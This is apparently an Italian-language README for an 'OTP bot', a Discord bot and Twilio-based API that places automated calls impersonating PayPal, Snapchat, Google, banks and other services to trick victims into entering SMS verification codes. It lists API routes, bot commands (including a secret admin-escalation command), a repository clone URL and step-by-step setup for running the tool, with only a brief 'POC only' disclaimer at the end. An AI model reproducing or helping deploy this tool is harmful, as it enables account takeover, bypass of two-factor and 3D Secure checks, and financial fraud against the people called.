
otp bot
Bypassa le verifiche SMS di Paypal, Instagram, Snapchat, Google, 3D Secure e molti altri... usando un Bot Discord o l'API privata.
È davvero semplice. Immagina che il tuo amico abbia un account Snapchat, provi a reimpostare la sua password usando il sistema SMS :
Poi usi il bot (!call 33612345678 snapchat). Il bot lo chiamerà, usando il servizio Snapchat, chiedendo il codice ricevuto. Se invia il codice usando il tastierino numerico, riceverai il codice e potrai reimpostare la password. È come un sistema automatico per il social engineering.
Le richieste API disponibili e funzionanti :
/call con POST DATA :
to: theClientPhoneNumberuser: theUserservice: theUsedServicename: theNameOfTheUserpassword: yourApiPassword/get con POST DATA :
callSid: theCallSidpassword: yourApiPassword/stream/service con GET DATA :
service: theServiceNameYouWannaUse/voice/password con POST DATA :
password: yourApiPasswordcallSid: theCallSidDigits: theDigitsEnteredByTheUSer (non obbligatorio)Tutti i comandi Admin :
!user add @user : consenti a qualcuno di usare il bot e le chiamate!user delete @user : rimuovi qualcuno o un admin dal bot!user info @user : ottieni informazioni su un utente!user setadmin @user : imposta un utente come adminTutti i comandi Utenti :
!secret yoursecretpassword @user : imposta un utente come admin senza essere admin!call phonenumber service o ad esempio !call 33612345678 paypal : chiama il numero usando il bot e ottieni il codice SMSI diversi servizi di chiamata supportati :
PaypalGoogleSnapchatInstagramFacebookWhatsappTwitterAmazonCdiscountDefault : work for all the systemsBanque : bypass 3D Secure!call 3312345678 paypal, il Bot Discord invia una richiesta POST alla nostra API privata, che salverà la chiamata nel nostro database sqlite e invierà la chiamata alla nostra API Twilio./status per sapere cosa fare nella chiamata; la rotta di stato restituisce codice TwiML a Twilio./status restituisce il brano del servizio self-hosted usando la /stream/service route./status invia il codice al tuo canale Discord usando un webhook.Scarica i file dell'API da github
git clone https://github.com/Ross1337/SMSBotBypass.git
Vai nella cartella della nostra API
cd /SMSBotBypass/api/
Installa le dipendenze
npm i
Avvia l'API, attendi 15 secondi, poi fermala
npm start
Modifica il file config.js
Apri la porta 1337
Per controllare se tutto funziona correttamente, ho creato un sistema di test completo. Se il tuo account Twilio non è aggiornato, prima del test, vai al file /test/call.js e modifica il numero di telefono nella riga 122 con il tuo numero.
npm test

La tua API privata ora funziona! Se la tua API non funziona, aggiorna il tuo account Twilio e riprova.
Attenzione, devi anche cambiare la lingua del TTS. Vai su https://www.twilio.com/console/voice/twiml/text-to-speech e cambia la lingua del TTS da Inglese a Francese con la voce Lea.
Prendi la tua Password API dal file config.js nella cartella api, ci servirà
cd ../bots/discord
Modifica il file config.js
Crea due ruoli Discord, uno "Admin" con permessi di Amministratore, e l'altro "Bot User" con qualsiasi permesso.
Aggiungi il bot al server Discord
Inizializza il bot Discord
npm i
Ora puoi avviare il bot Discord
node bot.js
Puoi ottenere tutte le informazioni necessarie su Discord eseguendo !help

Questo codice è solo un codice POC, non usarlo illegalmente. Potresti essere arrestato se usi male questo codice. Usalo solo con i tuoi numeri di telefono o con persone che accettano di testare questo codice.
Sentiti libero di contribuire a questo progetto facendo fork e pull request di questa repo!